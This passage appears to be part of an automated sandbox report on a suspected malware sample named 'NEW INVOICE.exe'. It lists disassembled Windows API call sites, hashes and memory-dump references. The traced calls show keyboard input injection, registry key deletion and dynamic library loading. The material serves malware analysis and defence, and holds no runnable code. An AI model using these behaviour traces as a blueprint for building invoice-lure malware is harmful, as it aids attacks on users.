                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                                    • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$_wcslen
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 763830540-1403004172
                                                                                    • Opcode ID: 509af3a058f8d2ccd68eb6fec456bdedc6df801b0ffdee10d368a4f30f08f539
                                                                                    • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                                    • Opcode Fuzzy Hash: 509af3a058f8d2ccd68eb6fec456bdedc6df801b0ffdee10d368a4f30f08f539
                                                                                    • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                      • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                      • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                      • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentHandleProcess$Duplicate
                                                                                    • String ID: nul
                                                                                    • API String ID: 2124370227-2873401336
                                                                                    • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                    • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                                    • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                    • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                      • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                      • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                      • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentHandleProcess$Duplicate
                                                                                    • String ID: nul
                                                                                    • API String ID: 2124370227-2873401336
                                                                                    • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                    • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                                    • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                    • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                    • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                    • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                    • String ID: SysAnimate32
                                                                                    • API String ID: 3529120543-1011021900
                                                                                    • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                    • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                                    • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                    • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                                    • TranslateMessage.USER32(?), ref: 0044308B
                                                                                    • DispatchMessageW.USER32(?), ref: 00443096
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Peek$DispatchTranslate
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1795658109-438819550
                                                                                    • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                    • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                                    • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                    • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                                    APIs
                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                      • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                      • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                      • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                      • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                    • GetFocus.USER32 ref: 004609EF
                                                                                      • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                      • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                                    • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                                    • __swprintf.LIBCMT ref: 00460A7A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                                    • String ID: %s%d
                                                                                    • API String ID: 991886796-1110647743
                                                                                    • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                    • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                                    • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                    • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$_sprintf
                                                                                    • String ID: %02X
                                                                                    • API String ID: 891462717-436463671
                                                                                    • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                    • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                                    • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                    • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0042CD00
                                                                                    • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                      • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\NEW INVOICE.exe,?,C:\Users\user\Desktop\NEW INVOICE.exe,004A8E80,C:\Users\user\Desktop\NEW INVOICE.exe,0040F3D2), ref: 0040FFCA
                                                                                      • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                      • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                      • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                      • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                      • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                      • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                                    • String ID: $OH$@OH$X
                                                                                    • API String ID: 3491138722-1394974532
                                                                                    • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                    • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                                    • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                    • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                                    • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                    • String ID:
                                                                                    • API String ID: 2449869053-0
                                                                                    • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                    • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                                    • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                    • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                                    • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                                    • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                                    • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                                    • SendInput.USER32 ref: 0044C509
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardMessagePostState$InputSend
                                                                                    • String ID:
                                                                                    • API String ID: 3031425849-0
                                                                                    • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                    • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                                    • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                    • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                                    APIs
                                                                                    • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                                    • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Enum$CloseDeleteOpen
                                                                                    • String ID:
                                                                                    • API String ID: 2095303065-0
                                                                                    • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                    • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                                    • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                    • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                                    APIs
                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                                    • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                    • String ID:
                                                                                    • API String ID: 2832842796-0
                                                                                    • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                    • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                                    • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                    • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                                    APIs
                                                                                    • GetClientRect.USER32(?,?), ref: 00447997
                                                                                    • GetCursorPos.USER32(?), ref: 004479A2
                                                                                    • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                                    • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                                    • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1822080540-0
                                                                                    • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                    • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                                    • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                    • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                    • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                    • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                    • String ID:
                                                                                    • API String ID: 659298297-0
                                                                                    • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                    • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                                    • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                    • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 004478A7
                                                                                    • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                                    • GetCursorPos.USER32(?), ref: 00447935
                                                                                    • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CursorMenuPopupTrack$Proc
                                                                                    • String ID:
                                                                                    • API String ID: 1300944170-0
                                                                                    • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                    • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                                    • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                    • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                                    APIs
